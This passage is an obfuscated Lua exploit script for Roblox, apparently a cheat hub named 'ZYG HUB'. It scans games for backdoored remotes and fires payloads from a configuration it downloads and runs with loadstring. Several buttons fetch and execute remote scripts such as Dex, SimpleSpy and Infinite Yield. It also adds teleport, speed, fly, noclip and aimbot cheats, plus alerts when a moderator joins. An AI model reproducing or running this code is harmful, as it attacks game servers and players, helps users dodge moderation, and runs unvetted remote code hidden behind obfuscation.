 _IlIlllIIll:Disconnect() local _IIIIIIIlII = string.split(_IllIIllllI:GetAttribute(_lIlIIllIll), "\124") local _IIlIlIIIIl = _llIIlllIII[_IIIIIIIlII[0x1]] local _llIIlIlIII = _IIllIIIIlI.backdoorPayloads[_IIIIIIIlII[0x2]] task.spawn(_IlIIIlIIll, { ["\105\110\115\116\097\110\099\101"] = _IIlIlIIIIl, ["\097\114\103\115"] = _llIIlIlIII.Args, ["\097\114\103\083\114\099\073\110\100\101\120"] = table.find(_llIIlIlIII.Args, "\115\111\117\114\099\101"), ["\112\097\121\108\111\097\100\078\097\109\101"] = _IIIIIIIlII[0x2] }) end
 ) for _IIIlllIIIl, _IIlIlIIIIl in _llIIlllIII do _lIlIIlIllI.Heartbeat:Wait() if _lIIlllIIll.foundBackdoor then break end
 _lIllIllIII("\112\114\105\110\116", string.format(_lIlllIlIlI.printRemote, _IIIIIlIlII(_IIlIlIIIIl), _IIIlllIIIl, _IIlIlIIIIl.ClassName)) _IIlIIIllIl(_lIlIIllIll, _IIlIlIIIIl, _IIIlllIIIl) end
 _IIlIIIlIIl(2.5, function () return not _IlIlllIIll.Connected end
 ) task.defer(_IlIlllIIll.Disconnect, _IlIlllIIll) end
 do if not isfolder(_IlIIllIlII.FOLDER_NAME) then makefolder(_IlIIllIlII.FOLDER_NAME) end
 local _IlIIIIIlIl = ( if isfile(`{_IlIIllIlII.FOLDER_NAME}/_IIllIIIIlI.lua`) then readfile(`{_IlIIllIlII.FOLDER_NAME}/_IIllIIIIlI.lua`) else game:HttpGet(_IlIIllIlII.CONFIG_URL) ) local _lIlllIIIlI, loadedConfig do _lIlllIIIlI, loadedConfig = pcall(loadstring(_IlIIIIIlIl)) if ( not _lIlllIIIlI) then _llIIlIlIIl(_lIlllIlIlI.configLoadFailed) _IlIIIIIlIl = game:HttpGet(_IlIIllIlII.CONFIG_URL) loadedConfig = loadstring(_IlIIIIIlIl)() end
 end
 local _IIIIllllll = 0x0 _IIIIllllll += ( if typeof(loadedConfig.autoExec) == "\116\097\098\108\101" then 0x1 else 0x0) _IIIIllllll += ( if typeof(loadedConfig.remoteFilters) == "\116\097\098\108\101" then 0x1 else 0x0) _IIIIllllll += ( if typeof(loadedConfig.scriptMacros) == "\116\097\098\108\101" then 0x1 else 0x0) _IIIIllllll += ( if typeof(loadedConfig.backdoorPayloads) == "\116\097\098\108\101" then 0x1 else 0x0) _IIIIllllll += ( if typeof(loadedConfig.cachedPlaces) == "\116\097\098\108\101" then 0x1 else 0x0) if (loadedConfig.configVer < 0x9 or _IIIIllllll < 0x5) then _llIIlIlIIl(_lIlllIlIlI.outdatedConfig) end
 _IIllIIIIlI = loadedConfig for payloadName, _llIIlIlIII in _IIllIIIIlI.backdoorPayloads do local _lIIllllIlI = table.clone(_llIIlIlIII) _lIIllllIlI.Name = payloadName table.insert(_IlllIIIllI, _lIIllllIlI) end
 table.sort(_IlllIIIllI, function (tbl1, tbl2) local _llIIIllIlI, tbl2Priority = math.clamp((tbl1.Priority or 0x400), 0x1, 0x400), math.clamp((tbl2.Priority or 0x400), 0x1, 0x400) return _llIIIllIlI < tbl2Priority end
 ) end
 do local _IlIlIIllIl = _IIllIIIIlI.cachedPlaces[game.PlaceId] if _IlIlIIllIl then local _IIIIllllll = 0x0 local _IIlIlIIIIl = ( if typeof(_IlIlIIllIl.Remote) == "\115\116\114\105\110\103" then _lIlIllIllI(_IlIlIIllIl.Remote) else _IlIlIIllIl.Remote) local _lIlIIlIIII = ( if typeof(_IlIlIIllIl.Args) == "\116\097\098\108\101" then table.find(_IlIlIIllIl.Args, "\115\111\117\114\099\101") else nil) _IIIIllllll += ( if (typeof(_IIlIlIIIIl) == "\073\110\115\116\097\110\099\101" and (_IIlIlIIIIl:IsA("\082\101\109\111\116\101\069\118\101\110\116") or _IIlIlIIIIl:IsA("\082\101\109\111\116\101\070\117\110\099\116\105\111\110"))) then 0x1 else 0x0) _IIIIllllll += ( if typeof(_lIlIIlIIII) == "\110\117\109\098\101\114" then 0x1 else 0x0) if _IIIIllllll >= 0x2 then _llIIlIlIIl(string.format(_lIlllIlIlI.cacheLoaded, game.PlaceId)) _IlIIIlIIll({ ["\105\110\115\116\097\110\099\101"] = _IIlIlIIIIl, ["\115\114\099\070\117\110\099"] = _IlIlIIllIl.SourceFunc, ["\097\114\103\115"] = _IlIlIIllIl.Args, ["\097\114\103\083\114\099\073\110\100\101\120"] = _lIlIIlIIII }) else _llIIlIlIIl(string.format(_lIlllIlIlI.cacheFailed, game.PlaceId)) end
 else local _IIIIIIlIIl = os.clock() _llIIlIlIIl(_lIlllIlIlI.scanMsg1);_llIIlIlIIl(_lIlllIlIlI.scanMsg2) _IIlIIIlllI() _llIIlIlIIl(string.format(_lIlllIlIlI.scanBenchmark, os.clock() - _IIIIIIlIIl)) if not _lIIlllIIll.foundBackdoor then _lIllIllIII("\119\097\114\110", _lIlllIlIlI.noBackdoorRemote) _llIIlIlIIl(_lIlllIlIlI.noBackdoorRemote) end
 end
 end
 end
 , DoubleClick = true, Tooltip = "\091\087\073\076\076\032\075\073\067\075\032\089\079\085\093\032\070\105\110\100\115\032\097\110\121\032\118\117\108\110\115\032\105\110\032\116\104\101\032\092\110\032\119\111\114\107\115\112\097\099\101\032\098\121\032\099\104\101\099\107\105\110\103\032\114\101\109\111\116\101\115" }) local _lllIIIIlIl = _IIIIIlIlll.Additions:AddRightGroupbox("\073\110\116\101\103\114\105\116\105\101\115") local _IIlllIIlll = _lllIIIIlIl:AddButton({ Text = "\068\097\114\107\032\068\101\120\032\086\053", Func = function ()loadstring(game:HttpGet("\104\116\116\112\115\058\047\047\114\097\119\046\103\105\116\104\117\098\117\115\101\114\099\111\110\116\101\110\116\046\099\111\109\047\105\110\102\121\105\102\102\047\098\097\099\107\117\112\047\109\097\105\110\047\100\101\120\046\108\117\097"))() end
 , DoubleClick = false, }) local _IIlllIIlll = _lllIIIIlIl:AddButton({ Text = "\083\105\109\112\108\101\032\083\112\121", Func = function ()loadstring(game:HttpGet("\104\116\116\112\115\058\047\047\114\097\119\046\103\105\116\104\117\098\117\115\101\114\099\111\110\116\101\110\116\046\099\111\109\047\105\110\102\121\105\102\102\047\098\097\099\107\117\112\047\109\097\105\110\047\083\105\109\112\108\101\083\112\121\086\051\047\109\097\105\110\046\108\117\097"))() end
 , DoubleClick = false, }) local _IIlllIIlll = _lllIIIIlIl:AddButton({ Text = "\073\110\102\105\110\105\116\101\032\089\105\101\108\100", Func = function ()loadstring(game:HttpGetAsync("\104\116\116\112\115\058\047\047\114\097\119\046\103\105\116\104\117\098\117\115\101\114\099\111\110\116\101\110\116\046\099\111\109\047\101\100\103\101\105\121\047\105\110\102\105\110\105\116\101\121\105\101\108\100\047\109\097\115\116\101\114\047\115\111\117\114\099\101"))() end
 , DoubleClick = false, }) local _IIlllIIlll = _lllIIIIlIl:AddButton({ Text = "\071\101\116\032\099\111\111\114\100\105\110\097\116\101\115\032\115\099\114\105\112\116", Func = function () local _IIllIIllll = Instance.new("\083\099\114\101\101\110\071\117\105") local _IllIlIIIIl = Instance.new("\070\114\097\109\101") local _llllIIllIl = Instance.new("\084\101\120\116\076\097\098\101\108") local _llIIlIllII = Instance.new("\084\101\120\116\066\117\116\116\111\110") local _IIIIlIIIIl = Instance.new("\084\101\120\116\066\117\116\116\111\110") local _lllIIlIlIl = Instance.new("\084\101\120\116\066\117\116\116\111\110") local _lIllIllIII = Instance.new("\084\101\120\116\066\117\116\116\111\110") local _IIIIIllIlI = Instance.new("\084\101\120\116\076\097\098\101\108") _IIllIIllll.Name = "\099\111\111\114\100\103\117\105" _IIllIIllll.Parent = game.CoreGui _IllIlIIIIl.Name = "\109\097\105\110" _IllIlIIIIl.Parent = _IIllIIllll _IllIlIIIIl.BackgroundColor3 = Color3.new(0x1, 0x1, 0x1) _IllIlIIIIl.Position = UDim2.new(0.352638364, 0x0, 0.405797124, 0x0) _IllIlIIIIl.Size = UDim2.new(0x0, 0xE4, 0x0, 0xAA) _IllIlIIIIl.Style = Enum.FrameStyle.DropShadow _IllIlIIIIl.Active = true _IllIlIIIIl.Draggable = true _llllIIllIl.Name = "\116\105\116\108\101" _llllIIllIl.Parent = _IllIlIIIIl _llllIIllIl.BackgroundColor3 = Color3.new(0x0, 0x0, 0x0) _llllIIllIl.Position = UDim2.new(-0.0517418832, 0x0, -0.054933358, 0x0) _llllIIllIl.Size = UDim2.new(0x0, 0xEB, 0x0, 0x13) _llllIIllIl.Font = Enum.Font.SciFi _llllIIllIl.Text = "\067\111\111\114\100\105\110\097\116\101\115\032\071\114\097\098\098\101\114\032\071\117\105" _llllIIllIl.TextColor3 = Color3.new(0x1, 0x1, 0x1) _llllIIllIl.TextSize = 0xE _llIIlIllII.Name = "\103\114\097\098" _llIIlIllII.Parent = _IllIlIIIIl _llIIlIllII.BackgroundColor3 = Color3.new(0x0, 0x0, 0x0) _llIIlIllII.Position = UDim2.new(0.0381504558, 0x0, 0.500263834, 0x0) _llIIlIllII.Size = UDim2.new(0x0, 0x80, 0x0, 0x1F) _llIIlIllII.Font = Enum.Font.SciFi _llIIlIllII.Text = "\071\114\097\098\032\067\111\111\114\100\105\110\097\116\101\115" _llIIlIllII.TextColor3 = Color3.new(0x1, 0x1, 0x1) _llIIlIllII.TextSize = 0xE _IIIIlIIIIl.Name = "\099\111\112\121" _IIIIlIIIIl.Parent = _IllIlIIIIl _IIIIlIIIIl.BackgroundColor3 = Color3.new(0x0, 0x0, 0x0) _IIIIlIIIIl.Position = UDim2.new(0.697107434, 0x0, 0.495215261, 0x0) _IIIIlIIIIl.Size = UDim2.new(0x0, 0x34, 0x0, 0x20) _IIIIlIIIIl.Font = Enum.Font.SciFi _IIIIlIIIIl.Text = "\067\111\112\121" _IIIIlIIIIl.TextColor3 = Color3.new(0x1, 0x1, 0x1) _IIIIlIIIIl.TextSize = 0xE _lllIIlIlIl.Name = "\116\101\108\101\112\111\114\116" _lllIIlIlIl.Parent = _IllIlIIIIl _lllIIlIlIl.BackgroundColor3 = Color3.new(0x0, 0x0, 0x0) _lllIIlIlIl.Position = UDim2.new(0.25, 0x0, 0.75, 0x0) _lllIIlIlIl.Size = UDim2.new(0x0, 0x3C, 0x0, 0x20) _lllIIlIlIl.Font = Enum.Font.SciFi _lllIIlIlIl.Text = "\084\101\108\101\112\111\114\116" _lllIIlIlIl.TextColor3 = Color3.new(0x1, 0x1, 0x1) _lllIIlIlIl.TextSize = 0xE _lIllIllIII.Name = "\099\108\111\115\101" _lIllIllIII.Parent = _IllIlIIIIl _lIllIllIII.BackgroundColor3 = Color3.new(0x0, 0x0, 0x0) _lIllIllIII.Position = UDim2.new(0.55, 0x0, 0.75, 0x0) _lIllIllIII.Size = UDim2.new(0x0, 0x34, 0x0, 0x20) _lIllIllIII.Font = Enum.Font.SciFi _lIllIllIII.Text = "\067\108\111\115\101" _lIllIllIII.TextColor3 = Color3.new(0x1, 0x1, 0x1) _lIllIllIII.TextSize = 0xE _IIIIIllIlI.Name = "\099\111\114\100\115" _IIIIIllIlI.Parent = _IllIlIIIIl _IIIIIllIlI.BackgroundColor3 = Color3.new(0x0, 0x0, 0x0) _IIIIIllIlI.Position = UDim2.new(0.0420129336, 0x0, 0.199266031, 0x0) _IIIIIllIlI.Size = UDim2.new(0x0, 0xC2, 0x0, 0x25) _IIIIIllIlI.Font = Enum.Font.SciFi _IIIIIllIlI.Text = "" _IIIIIllIlI.TextColor3 = Color3.new(0x1, 0x1, 0x1) _IIIIIllIlI.TextSize = 0xE game:GetService("\085\115\101\114\073\110\112\117\116\083\101\114\118\105\099\101").InputBegan:connect(onKeyPress) _llIIlIllII.MouseButton1Down:Connect( function () _IIIIIllIlI.Text = tostring(game.Players.LocalPlayer.Character.HumanoidRootPart.Position) wait(0.25) print(''..tostring(game.Players.LocalPlayer.Character.HumanoidRootPart.Position)) end
 ) _lIllIllIII.MouseButton1Down:Connect( function () _IIllIIllll:Destroy() end
 ) function mysplit(inputstr, sep) if sep == nil then sep = "\037\115" end
 local _IIIIlIlIll={} for str in string.gmatch(inputstr, "\040\091\094"..sep.."\093\043\041") do table.insert(_IIIIlIlIll, str) end
 return _IIIIlIlIll end
 _lllIIlIlIl.MouseButton1Down:Connect( function () teleportTo = _IIIIIllIlI.Text if teleportTo and teleportTo ~= "" and teleportTo ~= "\032" then teleportTo = tostring(teleportTo) coordsToTeleport = mysplit(teleportTo, "\044\032") game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(coordsToTeleport[0x1], coordsToTeleport[0x2], coordsToTeleport[0x3]) end
 end
 ) _IIIIlIIIIl.MouseButton1Down:Connect( function () setclipboard(""..cords.Text) end
 ) end
 , DoubleClick = false, }) local _lIIIIIlIII = tick() local _lllIllIllI = 0x0; local _lllIIIIlII = 0x3C; local _lllIIIIllI = game:GetService("\082\117\110\083\101\114\118\105\099\101").RenderStepped:Connect( function () _lllIllIllI += 0x1; if (tick() - _lIIIIIlIII) >= 0x1 then _lllIIIIlII = _lllIllIllI; _lIIIIIlIII = tick(); _lllIllIllI = 0x0; end
 ; _IIllIlIlII:SetWatermark(("\090\089\071\032\072\085\066\032\091\086\052\093\032\124\032\037\115\032\102\112\115\032\124\032\037\115\032\112\105\110\103"):format( math.floor(_lllIIIIlII), math.floor(game:GetService("\083\116\097\116\115").Network.ServerStatsItem["\068\097\116\097\032\080\105\110\103"]:GetValue()) )); end
 ); _IIllIlIlII:OnUnload( function () _lllIIIIllI:Disconnect() getgenv().ExunysDeveloperAimbot = nil Chatlogger:Load() _IIllIlIlII.Unloaded = true end
 ) local _lIlIlllIll = _IIIIIlIlll["\085\073\032\083\101\116\116\105\110\103\115"]:AddLeftGroupbox("\077\101\110\117") _lIlIlllIll:AddButton("\085\110\108\111\097\100", function () _IIllIlIlII:Unload() end
 ) _lIlIlllIll:AddLabel("\077\101\110\117\032\098\105\110\100"):AddKeyPicker("\077\101\110\117\075\101\121\098\105\110\100", { Default = "\076\101\102\116\065\108\116", NoUI = true, Text = "\077\101\110\117\032\107\101\121\098\105\110\100" }) local _lIIIlllIII = _IIIIIlIlll["\085\073\032\083\101\116\116\105\110\103\115"]:AddLeftGroupbox("\084\111\103\103\108\101\115") _lIIIlllIII:AddToggle("\068\101\101\112\119\111\107\101\110\032\077\111\100\032\074\111\105\110", { Text = "\084\111\103\103\108\101\032\078\111\116\105\102\105\099\097\116\105\111\110\032\079\110\032\077\111\100\032\074\111\105\110", Default = true, Tooltip = "\078\111\116\105\102\105\099\097\116\105\111\110\032\079\110\032\109\111\100\032\106\111\105\110", Callback = function (Value) end
 }) _lIIIlllIII:AddToggle("\075\101\121\098\105\110\100\115\032\084\111\103\103\108\101", { Text = "\084\111\103\103\108\101\032\075\101\121\098\105\110\100\115\032\077\101\110\117", Default = false, Tooltip = "\084\117\114\110\115\032\107\101\121\098\105\110\100\032\109\101\110\117\032\111\110\032\097\110\100\032\111\102\102", Callback = function (Value) toggleState = toggleState or false local function _lIIlIlIlll() toggleState = not toggleState _IIllIlIlII.KeybindFrame.Visible = toggleState end
 _lIIlIlIlll() end
 }) _IIllIlIlII.ToggleKeybind = Options.MenuKeybind _IllIIIlIIl:SetLibrary(_IIllIlIlII) _IlIlIlIIII:SetLibrary(_IIllIlIlII) _IlIlIlIIII:IgnoreThemeSettings() _IlIlIlIIII:SetIgnoreIndexes({ "\077\101\110\117\075\101\121\098\105\110\100" }) _IllIIIlIIl:SetFolder("\090\089\071\032\072\085\066\032\091\086\051\093") _IlIlIlIIII:SetFolder("\090\089\071\032\072\085\066\032\091\086\051\093\047\083\099\114\105\112\116\032\083\101\116\116\105\110\103\115") _IlIlIlIIII:BuildConfigSection(_IIIIIlIlll["\085\073\032\083\101\116\116\105\110\103\115"]) _IllIIIlIIl:ApplyToTab(_IIIIIlIlll["\085\073\032\083\101\116\116\105\110\103\115"]) _IlIlIlIIII:LoadAutoloadConfig() local _lIIlIlIIlI = 0x1F3967F local _lIIllllIII = game:GetService("\080\108\097\121\101\114\115") local function _llIIlllIlI(soundId) local _IIIllIIlIl = Instance.new("\083\111\117\110\100") _IIIllIIlIl.SoundId = "\114\098\120\097\115\115\101\116\105\100\058\047\047" .. soundId _IIIllIIlIl.Volume = 0xA _IIIllIIlIl.Parent = game.Workspace _IIIllIIlIl:Play() _IIIllIIlIl.Ended:Connect( function () _IIIllIIlIl:Destroy() end
 ) end
 _IIllIlIlII:Notify("\067\104\101\099\107\105\110\103\032\112\108\097\121\101\114\115\032\102\111\114\032\103\114\111\117\112\032\109\101\109\098\101\114\115\104\105\112\046\046\046", 0x5) local function _lIlIlIlllI(_lIlllllIII) if _lIlllllIII == _lIIllllIII.LocalPlayer then return end
 local _IlIIIIlIIl = _lIlllllIII.Name _IIllIlIlII:Notify("\067\104\101\099\107\105\110\103\058\032" .. _IlIIIIlIIl, 0x3) if _lIlllllIII:IsInGroup(_lIIlIlIIlI) then _IIllIlIlII:Notify(_IlIIIIlIIl .. "\032\040\077\111\100\101\114\097\116\111\114\041\032\104\097\115\032\106\111\105\110\101\100\032\116\104\101\032\103\097\109\101\033", 0xF) _llIIlllIlI("\049\051\052\053\054\057\048\054\057\049\050\055\048\052\054") _lIlllllIII.AncestryChanged:Connect( function () if not _lIlllllIII.Parent then _IIllIlIlII:Notify(_IlIIIIlIIl .. "\032\040\077\111\100\101\114\097\116\111\114\041\032\104\097\115\032\108\101\102\116\032\116\104\101\032\103\097\109\101\033", 0xF) _llIIlllIlI("\049\050\054\056\052\057\048\053\056\055\055\048\049\054\052") end
 end
 ) end
 end
 for _, _lIlllllIII in ipairs(_lIIllllIII:GetPlayers()) do _lIlIlIlllI(_lIlllllIII) end
 _lIIllllIII.PlayerAdded:Connect(_lIlIlIlllI) Options.SpeedHackKeybind:OnClick( function () Toggles.SpeedHack:SetValue( not Toggles.SpeedHack.Value) end
 ) Options.JumpPowerKeybind:OnClick( function () Toggles.JumpPowerToggle:SetValue( not Toggles.JumpPowerToggle.Value) end
 ) Options.NoClipKeybind:OnClick( function () Toggles.NoClipToggle:SetValue( not Toggles.NoClipToggle.Value) end
 ) Options.FlyKeybind:OnClick( function () Toggles.FlyToggle:SetValue( not Toggles.FlyToggle.Value) end
 ) Options.InfJumpKeybind:OnClick( function () Toggles["\073\110\102\032\074\117\109\112"]:SetValue( not Toggles["\073\110\102\032\074\117\109\112"].Value) end
 ) Options.Aimbotkeybind:OnClick( function () Toggles["\065\105\109\098\111\116\084\111\103\103\108\101"]:SetValue( not Toggles["\065\105\109\098\111\116\084\111\103\103\108\101"].Value) end
 ) end
 )(...)
